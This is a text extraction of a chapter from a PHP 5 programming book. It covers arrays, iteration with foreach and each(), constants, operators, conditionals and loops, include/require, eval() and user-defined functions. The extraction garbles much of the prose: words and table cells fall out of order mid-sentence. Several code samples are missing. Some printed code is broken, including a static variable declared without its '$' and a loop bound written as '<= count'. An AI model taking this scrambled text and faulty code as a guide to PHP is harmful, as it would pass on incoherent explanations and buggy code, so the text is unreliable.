53 Gutmans_ch02 Page 25 Thursday, September 23, 2004 2:37 PM 2.5 Basic Data Types 25 [1] => 2 [2] => 3 ) Array ( [0] => 1 [1] => 2 [2] => 3 ) So, you can see that you can use both the array() construct and the notation to create arrays. Usually, $arr[key] is used to declare arrays array() $arr[key] notation is used whose elements are known at compile-time, and the when the elements are only computed at runtime. PHP also supports a special notation, $arr[] , where the key is not speci- fied. When creating new array offsets using this notation (fo example, using it as the l-value), the key is automatically assigned as one more than the largest previous integer key. Therefore, the previous example can be rewritten as follows: $arr1 = array(1, 2, 3); $arr2[] = 1; $arr2[] = 2; $arr2[] = 3; The result is the same as in the previous example. The same holds true for arrays with string keys: $arr1 = array("name" => "John", "age" => 28); $arr2["name"] = "John"; $arr2["age"] = 28; if ($arr1 == $arr2) { print '$arr1 and $arr2 are the same' . "\n"; } The message confirming the equality of both arrays is printed. You can use the 2.5.7.4 Reading array values $arr[key] notation to read array values. The next few examples build on top of the previous example: print $arr2["name"]; if ($arr2["age"] < 35) { print " is quite young\n"; }

54 Gutmans_ch02 Page 26 Thursday, September 23, 2004 2:37 PM 26 PHP 5 Basic Language Chap. 2 This example prints John is quite young $arr[] syntax is not supported Note: As previously mentioned, using the when reading array indexes, but only when writing them. When 2.5.7.5 Accessing Nested Arrays (or Multi-Dimensional Arrays) accessing nested arrays, you can just add as many square brackets as required to reach the relevant value. The following is an example of how you can declare nested arrays: $arr = array(1 => array("name" => "John", "age" => 28), array("name" ➥ => "Barbara", "age" => 67)) You could achieve the same result with the following statements: $arr[1]["name"] = "John"; $arr[1]["age"] = 28; $arr[2]["name"] = "Barbara"; $arr[2]["age"] = 67; Reading a nested array value is trivial using the same notation. For example, if you want to print John’s age, the following statement does the trick: print $arr[1]["age"]; foreach 2.5.7.6 Traversing Arrays Using There are a few different ways of iterating over an array. The most elegant way is the loop construct. foreach() The general syntax of this loop is foreach($array as [$key =>] [&] $value) ... is optional, and when specified, it contains the currently iterated $key value’s key, which can be either an integer or a string value, depending on the key’s type. & for the value is also optional, and it has to be done if you are Specifying planning to modify and want it to propagate to $array . In most cases, $value you won’t want to modify the $value when iterating over an array and will, therefore, not need to specify it.

55 Gutmans_ch02 Page 27 Thursday, September 23, 2004 2:37 PM 2.5 Basic Data Types 27 foreach() loop: Here’s a short example of the $players = array("John", "Barbara", "Bill", "Nancy"); print "The players are:\n"; foreach ($players as $key => $value) { print "#$key = $value\n"; } The output of this example is The players are: #0 = John #1 = Barbara #2 = Bill #3 = Nancy Here’s a more complicated example that iterates over an array of people and marks which person is considered old and which one is considered young: $people = array(1 => array("name" => "John", "age" => 28), ➥ array("name" => "Barbara", "age" => 67)); foreach ($people as &$person) { if ($person["age"] >= 35) { $person["age group"] = "Old"; } else { $person["age group"] = "Young"; } } print_r($people); Again, this code makes use of the print_r() function. The output of the previous code is the following: Array ( [1] => Array ( [name] => John [age] => 28 [age group] => Young ) [2] => Array ( [name] => Barbara [age] => 67 [age group] => Old

56 Gutmans_ch02 Page 28 Thursday, September 23, 2004 2:37 PM 28 PHP 5 Basic Language Chap. 2 ) ) You can see that both the John and Barbara arrays inside the $people array were added an additional value with their respective age group. list() Although foreach() and 2.5.7.7 Traversing Arrays Using each() is the nicer way of iterating over an array, an additional way of traversing an construct and the each() func- array is by using a combination of the list() tion: $players = array("John", "Barbara", "Bill", "Nancy"); reset($players); while (list($key, $val) = each($players)) { print "#$key = $val\n"; } The output of this example is #0 = John #1 = Barbara #2 = Bill #3 = Nancy Iteration in PHP is done by using an internal array pointer reset() 2.5.7.8 that keeps record of the current position of the traversal. Unlike with , when you want to use each() to iterate over an array, you must foreach() the array before you start to iterate over it. In general, it is best for reset() foreach() and not deal with this subtle nuisance of you to always use each() traversal. each() The each() 2.5.7.9 function returns the current key/value pair and advances the internal pointer to the next element. When it reaches the end of of the array, it returns a booloean value of false . The key/value pair is 0 and returned as an array with four elements: the elements , which "key" have the value of the key, and elements and "value" , which have the value 1 of the value. The reason for duplication is that, if you’re accessing these ele- ments individually, you’ll probably want to use the names such as and $elem["value"] : $elem["key"] $ages = array("John" => 28, "Barbara" => 67); reset($ages); $person = each($ages);

57 Gutmans_ch02 Page 29 Thursday, September 23, 2004 2:37 PM 2.5 Basic Data Types 29 print $person["key"]; print " is of age "; print $person["value"]; This prints John is of age 28 list() When we explain how the construct works, you will understand why offsets 0 and 1 also exist. list() list() construct is a way of assigning multiple array 2.5.7.10 The offsets to multiple variables in one statement: list($var1, $var2, ...) = $array; The first variable in the list is assigned the array value at offset 0, the second is assigned offset 1, and so on. Therefore, the list() construct trans- lates into the following series of PHP statements: $var1 = $array[0]; $var2 = $array[1]; ... each() are As previously mentioned, the indexes 0 and 1 returned by used by the list() construct. You can probably already guess how the combi- list() and work. nation of each() $players Consider the highlighted line from the previous traversal example: $players = array("John", "Barbara", "Bill", "Nancy"); reset($players); while (list($key, $val) = each($players)) { print "#$key = $val\n"; } What happens in the boldfaced line is that during every loop iteration, each() returns the current position’s key/value pair array, which, when exam- ined with print_r() , is the following array: Array ( [1] => John [value] => John

58 Gutmans_ch02 Page 30 Thursday, September 23, 2004 2:37 PM 30 PHP 5 Basic Language Chap. 2 [0] => 0 [key] => 0 ) construct assigns the array’s offset 0 to and offset 1 Then, the $key list() to $val . 2.5.7.11 Additional Methods for Traversing Arrays You can use other func- and next() tions to iterate over arrays including current() . You shouldn’t use them because they are confusing and are legacy functions. In addition, some standard functions allow all sorts of elegant ways of dealing with arrays such , which is covered in a later chapter. as array_walk() 2.5.8 Constants In PHP, you can define names, called , for simple values. As the constants name implies, you cannot change these constants once they represent a cer- tain value. The names for constants have the same rules as PHP variables except that they don’t have the leading dollar sign. It is common practice in many programming languages—including PHP—to use uppercase letters for constant names, although you don’t have to. If you wish, which we do not rec- ommend, you may define your constants as case-insensitive, thus not requir- ing code to use the correct casing when referring to your constants. Tip: Only use case-sensitive constants both to be consistent with accepted cod- ing standards and because it is unclear if case-insensitive constants will con- tinued to be supported in future versions of PHP. Unlike variables, constants, once defined, are globally accessible. You don’t have to (and can’t) redeclare them in each new function and PHP file. To define a constant, use the following function: define("CONSTANT_NAME", value [, case_sensitivity]) Where: ☞ "CONSTANT_NAME" is a string. ☞ is any valid PHP expression excluding arrays and objects. value ☞ is a Boolean ( true/false ) and is optional. The default is case_sensitivity true . An example for a built-in constant is the Boolean value true , which is registered as case-insensitive. Here’s a simple example for defining and using a constant:

59 Gutmans_ch02 Page 31 Thursday, September 23, 2004 2:37 PM 2.6 Operators 31 define("MY_OK", 0); define("MY_ERROR", 1); ... if ($error_code == MY_ERROR) { print("There was an error\n"); } 2.6 O PERATORS PHP contains three types of operators: unary operators, binary operators, and one ternary operator. are used on two operands: Binary operators 2 + 3 14 * 3.1415 $i – 1 These examples are also simple examples of expressions. PHP can only perform binary operations on two operands that have the same type. However, if the two operands have different types, PHP automati- cally converts one of them to the other’s type, according to the following rules (unless stated differently, such as in the concatenation operator). Conversion Performed Type of the Other Type of One of the Operands Operand The integer operand is Integer Floating point converted to a floating point number. The string is converted to a number. If the converted , the real String Integer string’s type is integer operand is converted to a real as well. The string is converted to String Real a real. Booleans, nulls, and resources behave like integers, and they convert in the following manner: = 0, True = 1 ☞ Boolean: False Null = 0 ☞ Resource = The resource’s # (id) ☞

60 Gutmans_ch02 Page 32 Thursday, September 23, 2004 2:37 PM 32 PHP 5 Basic Language Chap. 2 2.6.1 Binary Operators 2.6.1.1 Numeric Operators All the binary operators (except for the concate- nation operator) work only on numeric operands. If one or both of the oper- ands are strings, Booleans, nulls, or resources, they are automatically converted to their numeric equivalents before the calculation is performed (according to the previous table). Operator Name Value Addition The sum of the two operands. + - Subtraction The difference between the two operands. Multiplication The product of the two * operands. / Division The quotient of the two operands. % Modulus Both operands are converted to integers. The result is the remainder of the division of the first operand by the second operand. 2.6.1.2 Concatenation Operator (.) The concatenation operator concate- nates two strings. This operator works only on strings; thus, any non-string operand is first converted to one. The following example would print out : "The year is 2000" $year = 2000; print "The year is " . $year; The integer before it is "2000" is internally converted to the string $year concatenated with the string’s prefix, "The year is" . 2.6.2 Assignment Operators Assignment operators enable you to write a value to a variable. The first operand (the one on the left of the assignment operator or l value) must be a variable. The value of an assignment is the final value assigned to the vari- able; for example, the expression $var = 5 5 (and assigns 5 to has the value ). $var

61 Gutmans_ch02 Page 33 Thursday, September 23, 2004 2:37 PM 2.6 Operators 33 = , several other assign- In addition to the regular assignment operator ment operators are composites of an operator followed by an equal sign. These composite operators apply the operator taking the variable on the left as the first operand and the value on the right (the r value) as the second operand, and assign the result of the operation to the variable on the left. For example: $counter += 2; // This is identical to $counter = $counter + 2; // This is identical to $offset = $offset * $offset *= $counter ; $counter; ➥ The following list show the valid composite assignment operators: +=, -=, *=, /=, %=, ^=, .=, &=, |=, <<=, >>= 2.6.2.1 By-Reference Assignment Operator PHP enables you to create vari- ables as aliases for other variables. You can achieve this by using the by-reference =& assignment operator . After a variable aliases another variable, changes to either one of them affects the other. For example: $name = "Judy"; $name_alias =& $name; $name_alias = "Jonathan"; print $name; The result of this example is Jonathan When returning a variable by-reference from a function (covered later in this book), you also need to use the assign by-reference operator to assign the returned variable to a variable: $retval =& func_that_returns_by_reference(); 2.6.3 Comparison Operators Comparison operators enable you to determine the relationship between two operands. When both operands are strings, the comparison is performed lexico- graphically. The comparison results in a Boolean value. For the following comparison operators, automatic type conversions are performed, if necessary.

62 Gutmans_ch02 Page 34 Thursday, September 23, 2004 2:37 PM 34 PHP 5 Basic Language Chap. 2 Operator Name Value == Equal to Checks for equality between two arguments performing type conver- sion when necessary: results in true 1 == "1" true 1 == 1 results in . == Inverse of != Not equal to > Greater than Checks if first operand is greater than second < Smaller than Checks if first operand is smaller than second >= Checks if first operand is Greater than or equal to greater or equal to second Checks if first operand <= Smaller than or equal to is smaller or equal to second per- not For the following two operators, automatic type conversions are formed and, therefore, both the types and the values are compared. Operator Name Value Same as === Identical to == but the types of the operands have to match. No automatic type conver- sions are performed: 1 === "1" results in false . 1 === 1 results in true . !== Not identical to The inverse of . === 2.6.4 Logical Operators first convert their operands to boolean values and then Logical operators perform the respective comparison.

63 Gutmans_ch02 Page 35 Thursday, September 23, 2004 2:37 PM 2.6 Operators 35 Value Name Operator &&, and The result of the logical Logical AND operation between the AND two operands ||, or OR Logical OR The result of the logical operation between the two operands xor The result of the logical Logical XOR operation between the XOR two operands When evaluating the logical / or and opera- 2.6.4.1 Short-Circuit Evaluation tors, you can often know the result without having to evaluate both operands. For example, when PHP evaluates 0 && 1 , it can tell the result will be false by looking only at the left operand, and it won’t continue to evaluate the right one. This might not seem useful right now, but later on, we’ll see how we can use it to execute an operation only if a certain condition is met. 2.6.5 Bitwise Operators Bitwise operators perform an operation on the bitwise representation of their arguments. Unless the arguments are strings, they are converted to their corresponding integer representation, and the operation is then per- formed. In case both arguments are strings, the operation is performed between corresponding character offsets of the two strings (each character is treated as an integer). Operator Name Value & Unless both operands are Bitwise AND strings, the integer value of the bitwise AND operation between the two operands. If both operands are strings, a string in which each character is the result of a bitwise AND operation between the two corresponding characters in the operands. In case the two operand strings are different lengths, the result string is truncated to the length of the shorter operand.

64 Gutmans_ch02 Page 36 Thursday, September 23, 2004 2:37 PM 36 PHP 5 Basic Language Chap. 2 | Unless both operands are Bitwise OR strings, the integer value of the bitwise OR operation between the two operands. If both operands are strings, a string in which each character is the result of a bitwise OR operation between the two corresponding characters in the operands. In case the two operand strings are of different lengths, the result string has the length of the oper- longer and; the missing characters in the shorter operand are assumed to be zeros. ^ Unless both operands are Bitwise XOR (exclusive or) strings, the integer value of the bitwise XOR operation between the two operands. If both operands are strings, a string in which each character is the result of a bitwise XOR operation between the two cor- responding characters in the operands. In case the two oper- and strings are of different lengths, the result string is truncated to the length of the operand. shorter 2.6.6 Unary Operators Unary operators act on one operand. 2.6.7 Negation Operators appear before their operand—for example, !$var (! is the Negation operators operator, is the operand). $var Name Operator Value ! true if the operand evalu- Logical Negation ates to . false False if the operand eval- uates to true .

65 Gutmans_ch02 Page 37 Thursday, September 23, 2004 2:37 PM 2.6 Operators 37 ~ In case of a numeric oper- Bitwise Negation and, the bitwise negation of its bitwise representa- tion (floating-point values are first converted to integers). In case of strings, a string of equal length, in which each character is the bit- wise negation of its corre- sponding character in the original string. 2.6.8 Increment/Decrement Operators are unique in the sense that they operate Increment/decrement operators only on variables and not on any value. The reason for this is that in addition to calculating the result value, the value of the variable itself changes as well. Name Operator Value of the Effect on $var Expression $var++ is incre- $var Post-increment The previous value of mented by 1. . $var ++$var is incre- Pre-increment $var The new value of mented by 1. (incremented $var by 1). $var-- Post-decrement $var The previous value is decre- mented by 1. of . $var --$var is decre- $var Pre-decrement The new value of mented by 1. $var (decre- mented by 1). As you can see from the previous table, there’s a difference in the value of $var is incremented by 1. The post- and pre-increment. However, in both cases, only difference is in the value to which the increment expression evaluates. Example 1: $num1 = 5; $num2 = $num1++;// post-increment, $num2 is assigned $num1's original ➥ value print $num1; // this will print the value of $num1, which is now 6 print $num2; // this will print the value of $num2, which is the ➥ original value of $num1, thus, 5

66 Gutmans_ch02 Page 38 Thursday, September 23, 2004 2:37 PM 38 PHP 5 Basic Language Chap. 2 Example 2: $num1 = 5; $num2 = ++$num1;// pre-increment, $num2 is assigned $num1's ➥ incremented value print $num1; // this will print the value of $num1, which is now 6 print $num2; // this will print the value of $num2, which is the ➥ same as the value of $num1, thus, 6 The same rules apply to pre- and post-decrement. Strings (when not numeric) are incremented 2.6.8.1 Incrementing Strings in a similar way to Perl. If the last letter is alphanumeric, it is incremented by 1. If it was ‘z’, ‘Z’, or ‘9’, it is incremented to ‘a’, ‘A’, or ‘0’ respectively, and the next alphanumeric is also incremented in the same way. If there is no next alphanumeric, one is added to the beginning of the string as ‘a’, ‘A’, and ‘1,’ respectively. If this gives you a headache, just try and play around with it. You’ll get the hang of it pretty quickly. Non-numeric strings cannot be decremented. Note: 2.6.9 The Cast Operators PHP provides a C-like way to force a type conversion of a value by using the . The operand appears on the right side of the cast operator, cast operators and its result is the converted type according to the following table. Changes Type To Operator (int) , (integer) Integer , Floating point (double) , (real) (float) (string) String (bool) Boolean (boolean) , (array) Array (object) Object The casting operators change the type of a value and not the type of a variable. For example: $str = "5"; $num = (int) $str; $str , but $str (5) being assigned the integer value of This results in $num remains of type string.

67 Gutmans_ch02 Page 39 Thursday, September 23, 2004 2:37 PM 2.7 Control Structures 39 2.6.10 The Silence Operator The operator @ silences error messages during the evaluation process of an expression. It is discussed in more detail in Chapter 7. 2.6.11 The One and Only Ternary Operator One of the most elegant operators is the (question mark) operator. Its for- ?: mat is truth_expr ? expr1 : expr2 The operator evaluates truth_expr and checks whether it is true. If it is, ( the value of the expression evaluates to the value of is not evalu- expr1 expr2 expr2 ated). If it is false, the value of the expression evaluates to the value of ( expr1 is not evaluated). For example, the following code snippet checks whether $a is set (using isset() ) and displays a message accordingly: $a = 99; $message = isset($a) ? '$a is set' : '$a is not set'; print $message; This example prints the following: $a is set 2.7 C ONTROL S TRUCTURES PHP supports a variety of the most common control structures available in other programming languages. They can be basically divided into two groups: and loop control structures conditional control structures . The condi- tional control structures affect the flow of the program and execute or skip cer- tain code according to certain criteria, whereas loop control structures execute certain code an arbitrary number of times according to specified criteria. 2.7.1 Conditional Control Structures Conditional control structures are crucial in allowing your program to take different execution paths based on decisions it makes at runtime. PHP sup- if and switch conditional control structures. ports both the

68 Gutmans_ch02 Page 40 Thursday, September 23, 2004 2:37 PM 40 PHP 5 Basic Language Chap. 2 if 2.7.1.1 Statements Statement List Statement expr if ( expr if ( ): ) statement statement list ): ) expr elseif ( expr elseif ( statement statement list ): elseif ( expr elseif ( expr ) statement list statement ... ... else else: statement statement list endif; if statements are the most common conditional constructs, and they statement is if exist in most programming languages. The expression in the truth expression referred to as the . If the truth expression evaluates to true , the statement or statement list following it are executed; otherwise, they’re not. You can add an if branch to an else statement to execute code only if all statement evaluated to : if the truth expressions in the false if ($var >= 50) { print '$var is in range'; } else { print '$var is invalid'; } , else and if Notice the braces that delimit the statements following which make these statements a statement block. In this particular case, you can omit the braces because both blocks contain only one statement in them. It is good practice to write these braces even if they’re not syntactically required. Doing so improves readability, and it’s easier to add more state- ments to the block later (for example, during debugging). if construct can be used to conduct a series of conditional checks elseif The and only execute the code following the first condition that is met. For example: if ($num < 0) { print '$num is negative'; } elseif ($num == 0) { print '$num is zero'; } elseif ($num > 0) { print '$num is positive'; }

69 Gutmans_ch02 Page 41 Thursday, September 23, 2004 2:37 PM 2.7 Control Structures 41 elseif The last $num is not could be substituted with an else because, if negative and not zero, it must be positive. else if nota- Note: It’s common practice by PHP developers to use C-style tion instead of . elseif if Both styles of the construct behave in the same way. While the state- ment style is probably more readable and convenient for use inside PHP code blocks, the statement list style extends readability when used to conditionally display HTML blocks. Here’s an alternative way to implement the previous example using HTML blocks instead of print :

$num is negative

$num is zero

0): ?>

$num is positive

As you can see, HTML blocks can be used just like any other statement. Here, only one of the HTML blocks are displayed, depending on the value of $num . Note: No variable substitution is performed in the HTML blocks. They are always printed as is. Statements 2.7.1.2 switch Statement List Statement ): expr switch ( switch ( ){ expr : expr case : expr case statement list statement list expr expr case case : : statement list statement list ... ... default: default: statement list statement list } endswitch; if/ You can use the switch construct to elegantly replace certain lengthy constructs. It is given an expression and compares it to all possible case elseif expressions listed in its body. When there’s a successful match, the following code is executed, ignoring any further case lines (execution does not stop when is reached). The match is done internally using the regular case the next equality operator ( break ). You can use the === ), not the identical operator ( == switch statement to end execution and skip to the code following the construct.

70 Gutmans_ch02 Page 42 Thursday, September 23, 2004 2:37 PM 42 PHP 5 Basic Language Chap. 2 break case statement list, although Usually, statements appear at the end of a expression is met and the switch it is not mandatory. If no case construct con- default , the default default tains statement list is executed. Note that the case must appear last in the list of cases or not appear at all: switch ($answer) { case 'y': case 'Y': print "The answer was yes\n"; break; case 'n': case 'N': print "The answer was no\n"; break; default: print "Error: $answer is not a valid answer\n"; break; } 2.7.2 Loop Control Structures Loop control structures are used for repeating certain tasks in your program, such as iterating over a database query result set. while 2.7.2.1 loops Statement Statement List ): expr while ( ) expr while ( statement list statement endwhile; are the simplest kind of loops. In the beginning of each iter- while loops true , the ation, the while’s truth expression is evaluated. If it evaluates to loop keeps on running and the statements inside it are executed. If it evalu- , the loop ends and the statement(s) inside the loop is skipped. For false ates to while loop example, here’s one possible implementation of factorial, using a (assuming contains the number for which we want to calculate the facto- $n rial): $result = 1; while ($n > 0) { $result *= $n--; } print "The result is $result";

71 Gutmans_ch02 Page 43 Thursday, September 23, 2004 2:37 PM 2.7 Control Structures 43 break and 2.7.2.2 Loop Control: continue break ; break expr; continue ; expr; continue Sometimes, you want to terminate the execution of a loop in the middle of an iteration. For this purpose, PHP provides the break statement. If break appears alone, as in break; accepts an optional argument of the the innermost loop is stopped. break amount of nesting levels to break out of, n break ; ). innermost loops ( ; is identical to n ; break 1 which will break from the break can be any valid expression. n In other cases, you may want to stop the execution of a specific loop itera- break , continue pro- tion and begin executing the next one. Complimentary to vides this functionality. continue alone stops the execution of the innermost continue loop iteration and continues executing the next iteration of that loop. n innermost loop iterations. PHP goes on n can be used to stop execution of the executing the next iteration of the outermost loop. switch break As the , it is counted as a loop when statement also supports break n you want to break out of a series of loops with . 2.7.2.3 do...while Loops do statement expr while ( ); do...while while loop, except that the The loop is similar to the previous truth expression is checked at the end of each iteration instead of at the begin- ning. This means that the loop always runs at least once. loops are often used as an elegant solution for easily breaking do...while out of a code block if a certain condition is met. Consider the following example: do { statement list if ($error) { break; }

72 Gutmans_ch02 Page 44 Thursday, September 23, 2004 2:37 PM 44 PHP 5 Basic Language Chap. 2 statement list } while (false); Because loops always iterate at least one time, the statements do...while inside the loop are executed once, and only once. The truth expression is . However, inside the loop body, you can use the statement false always break to stop the execution of the statements at any point, which is convenient. Of do...while course, loops are also often used for regular iterating purposes. 2.7.2.4 for Loops Statement List Statement for (expr, expr, ...; expr, expr, ...; expr, expr, ...) for (expr, expr, ...; expr, expr, ...; expr, expr, ...): statement statement list endfor; PHP provides C-style for for loop accepts three arguments: loops. The for (start_expressions; truth_expressions; increment_expressions) Most commonly, for loops are used with only one expression for each of the start, truth, and increment expressions, which would make the previous syntax table look slightly more familiar. Statement List Statement for (expr; expr; expr) for (expr; expr; expr): statement statement list endfor; The start expression is evaluated only once when the loop is reached. Usually it is used to initialize the loop control variable. The truth expression is the statements true , evaluated in the beginning of every loop iteration. If inside the loop will be executed; if false , the loop ends. The increment expres- sion is evaluated at the end of every iteration before the truth expression is evaluated. Usually, it is used to increment the loop control variable, but it can behave the continue and break be used for any other purpose as well. Both continue same way as they do with while causes evaluation of the incre- loops. ment expression before it re-evaluates the truth expression.

73 Gutmans_ch02 Page 45 Thursday, September 23, 2004 2:37 PM 2.7 Control Structures 45 Here’s an example: for ($i = 0; $i < 10; $i++) { print "The square of $i is " . $i*$i . "\n"; } The result of running this code is The square of 0 is 0 The square of 1 is 1 ... The square of 9 is 81 Like in C, it is possible to supply more than one expression for each of the three arguments by using commas to delimit them. The value of each argu- ment is the value of the rightmost expression. Alternatively, it is also possible not to supply an expression with one or more of the arguments. The value of such an empty argument will be true . For example, the following is an infinite loop: for (;;) { print "I'm infinite\n"; } PHP doesn’t know how to optimize many kinds of loop invariants. For Tip: for loop, count($array) will not be optimized to run example, in the following only once. for ($i = 0; $i <= count($array); $i++) { } It should be rewritten as $count = count($array); for ($i = 0; $i <= $count; $i++) { } This ensures that you get the best performance during the execution of the loop.

74 Gutmans_ch02 Page 46 Thursday, September 23, 2004 2:37 PM 46 PHP 5 Basic Language Chap. 2 2.7.3 Code Inclusion Control Structures Code inclusion control structures are crucial for organizing a program’s source code. Not only will they allow you to structure your program into building blocks, but you will probably find that some of these building blocks can later be reused in other programs. 2.7.3.1 Statement and Friends As in other languages, PHP allows include include statement. Split- for splitting source code into multiple files using the ting your code into many files is usually helpful for code reuse (being able to include the same source code from various scripts) or just in helping keep the include statement is executed, PHP reads code more maintainable. When an the file, compiles it into intermediate code, and then executes the included code. Unlike C/C++, the include statement behaves somewhat like a function (although it isn’t a function but a built-in language construct) and can return return a value using the statement. Also, the included file runs in the same variable scope as the including script (except for the execution of included functions which run with their their own variable scope). The prototype of include is include file_name; include Here are two examples for using : ☞ error_codes.php ☞ test.php This prints as The value of $MY_OK is 0

75 Gutmans_ch02 Page 47 Thursday, September 23, 2004 2:37 PM 2.7 Control Structures 47 You can use both relative and absolute paths as the file name. Many developers like using absolute path names and create it by concatenating the server’s document root and the relative path name. This allows them great flexibility when moving their PHP application among different servers and PHP installations. For example: include $_SERVER["DOCUMENT_ROOT"] . "/myscript.php"; allow_url_fopen In addition, if the INI directive, , is enabled in your PHP configuration (the default), you can also include URLs. This method is not rec- ommended for performance reasons because PHP must first download the source code to be included before it runs it. So, use this option only when it’s really necessary. Here’s an example: include "http://www.example.org/example.php"; The included URL must return a valid PHP script and not a web page which is HTML (possibly created by PHP). You can also use other protocols besides HTTP, such as FTP. emits a PHP warn- When the included file or URL doesn’t exist, include ing but does not halt execution. If you want PHP to error out in such a case (usually, this is a fatal condition, so that’s what you’d probably want), you can statement, which is otherwise identical to include use the require . There are two additional variants of include/require, which are probably the most useful. which behave exactly like their include_once/require_once include/require counterparts, except that they “remember” what files have include_once/require_once the same file been included, and if you try and again, it is just ignored. This behavior is similar to the C workaround for not including the same header files more than once. For the C developers among you, here’s pretty much the require_once equivalent in C: my_header.h: #ifndef MY_HEADER_H #define MY_HEADER_H 1 ... /* The file's code */ #endif 2.7.3.2 eval() is similar to include, but instead of compiling and eval() executing code that comes from a file, it accepts the code as a string. This can be useful for running dynamically created code or retrieving code from an external data source manually (for example, a database) and then executing it. As the use of eval() is much less efficient than writing the code as part of your PHP code, we encourage you not to use it unless you can’t do without:

76 Gutmans_ch02 Page 48 Thursday, September 23, 2004 2:37 PM 48 PHP 5 Basic Language Chap. 2 $str = '$var = 5;'; eval($str); print $var; This prints as 5 Tip: Variables that are based on user input should never be directly passed to eval() because this might allow the user to execute arbitrary code. 2.8 F UNCTIONS A function in PHP can be built-in or user-defined; however, they are both called the same way. The general form of a function call is func(arg1,arg2,...) The number of arguments varies from one function to another. Each argument can be any valid expression, including other function calls. Here is a simple example of a predefined function: $length = strlen("John"); strlen is a standard PHP function that returns the length of a string. $length is assigned the length of the string Therefore, : four. "John" Here’s an example of a function call being used as a function argument: $length = strlen(strlen("John")); You probably already guessed the result of this example. First, the inner is executed, which results in the integer 4. So, the code simpli- strlen("John") fies to $length = strlen(4); strlen() expects a string, and therefore (due to PHP’s magical auto- 4 to the string conversion between types) converts the integer and "4", thus, the resulting value of $length is 1 , the length of "4" .

77 Gutmans_ch02 Page 49 Thursday, September 23, 2004 2:37 PM 2.8 Functions 49 2.8.1 User-Defined Functions The general way of defining a function is _ name ( arg1 , arg2 , arg3 , ...) function function { statement list } To return a value from a function, you need to make a call to return expr inside your function. This stops execution of the function and returns expr as the function’s value. The following example function accepts one argument, , and returns its $x square: function square ($x) { return $x*$x; } After defining this function, it can be used as an expression wherever you desire. For example: print 'The square of 5 is ' . square(5); 2.8.2 Function Scope Every function has its own set of variables. Any variables used outside the function’s definition are not accessible from within the function by default. When a function starts, its function parameters are defined. When you use new variables inside a function, they are defined within the function only and don’t hang around after the function call ends. In the following example, the variable is not changed by the function call: $var function func () { $var = 2; } $var = 1; func(); print $var;

78 Gutmans_ch02 Page 50 Thursday, September 23, 2004 2:37 PM 50 PHP 5 Basic Language Chap. 2 func is called, the variable which is assigned 2, When the function $var, outside the is only in the scope of the function and thus does not change $var function. The code snippet prints out . 1 Now what if you actually do want to access and/or change on the $var outside? As mentioned in the “Variables” section, you can use the built-in $GLOBALS[] array to access variables in the global scope of the script. Rewrite the previous script the following way: function func () { $GLOBALS["var"] = 2; } $var = 1; func(); print $var; It prints the value . 2 global keyword also enables you to declare what global variables you A want to access, causing them to be imported into the function’s scope. How- ever, using this keyword is not recommended for various reasons, such as mis- behaving with assigning values by reference, not supporting and so unset(), on. Here’s a short description of it—but please, don’t use it! The syntax is global $var1, $var2, ...; Adding a global line for the previous example results in the following: function func() { global $var; $var = 2; } $var = 1; func(); print $var; 2 This way of writing the example also prints the number . 2.8.3 Returning Values By Value return statement is used to You can tell from the previous example that the return return values from functions. The by value , statement returns values which means that a copy of the value is created and is returned to the caller of the function. For example:

79 Gutmans_ch02 Page 51 Thursday, September 23, 2004 2:37 PM 2.8 Functions 51 function get_global_variable_value($name) { return $GLOBALS[$name]; } $num = 10; $value = get_global_variable_value("num"); print $value; This code prints the number 10 . However, making changes to $value before statement only affects $value and not the global variable $num the print . This is get_global_variable_value() by value and because its value was returned by the not by reference. 2.8.4 Returning Values By Reference by reference . This means that you’re PHP also allows you to return variables not returning a copy to the variable, but you’re returning the address of your variable instead, which enables you to change it from the calling scope. To return a variable by-reference, you need to define the function as such by plac- sign in front of the function’s name and in the caller’s code, assigning & ing an $value : the return value by reference to function &get_global_variable($name) { return $GLOBALS[$name]; } $num = 10; $value =& get_global_variable("num"); print $value . "\n"; $value = 20; print $num; The previous code prints as 10 20 $num $value , You can see that was successfully modified by modifying because it is a reference to the global variable . $num You won’t need to use this returning method often. When you do, use it with care, because forgetting to assign by reference the by-reference returned value can lead to bugs that are difficult to track down.

80 Gutmans_ch02 Page 52 Thursday, September 23, 2004 2:37 PM 52 PHP 5 Basic Language Chap. 2 2.8.5 Declaring Function Parameters As previously mentioned, you can pass an arbitrary amount of arguments to a function. There are two different ways of passing these arguments. The first is , and the second is called passing by value the most common, which is called . Which kind of argument passing you would like is passing by reference specified in the function definition itself and not during the function call. 2.8.5.1 By-Value Parameters Here, the argument can be any valid expres- sion, the expression is evaluated, and its value is assigned to the correspond- is assigned the value 8 and $x ing variable in the function. For example, here, $y : is assigned the value of $c function pow($x, $y) { ... } pow(2*4, $c); 2.8.5.2 By-Reference Parameters Passing by-reference requires the argu- ment to be a variable. Instead of the variable’s value being passed, the corre- sponding variable in the function directly refers to the passed variable whenever used. Thus, if you change it inside the function, it affects the sent variable in the outer scope as well: function square(&$n) { $n = $n*$n; } $number = 4; square($number); print $number; The sign that proceeds $n in the function parameters tells PHP to pass & it by-reference, and the result of the function call is squared; thus, this $number code would print . 16 Default parameters like C++ are supported by 2.8.5.3 Default Parameters PHP. enable you to specify a default value for function Default parameters parameters that aren’t passed to the function during the function call. The default values you specify must be a constant value, such as a scalar, array with scalar values, or constant.

81 Gutmans_ch02 Page 53 Thursday, September 23, 2004 2:37 PM 2.8 Functions 53 The following is an example for using default parameters: function increment(&$num, $increment = 1) { $num += $increment; } $num = 4; increment($num); increment($num, 3); This code results in $num being incremented to 8 . First, it is incremented by the first call to increment by 1 is used, 1 , where the default increment size of 3 , altogether by 4 . and second, it is incremented by Note: When you a call a function with default arguments, after you omit a default function argument, you must emit any following arguments. This also means that following a default argument in the function’s definition, all other arguments must also be declared as default arguments. 2.8.6 Static Variables Like C, PHP supports declaring local function variables as static. These kind of variables remain in tact in between function calls, but are still only accessi- ble from within the function they are declared. Static variables can be initial- static ized, and this initialization only takes place the first time the declaration is reached. Here’s an example for the use of that runs initialization code the static first time (and only the first time) the function is run: function do_something() { static first_time = true; if (first_time) { // Execute this code only the first time the function is ➥ called ... } // Execute the function's main logic every time the function is ➥ called ... }

82 Gutmans_ch02 Page 54 Thursday, September 23, 2004 2:37 PM 54 PHP 5 Basic Language Chap. 2 2.9 S UMMARY This chapter covered PHP’s basic language features, including variables, control structures, and functions. You have learned all that there is to know syntax-wise to become productive with the language as a functional language. The next chapter covers PHP’s support for developers who want to develop using the object-oriented paradigm.

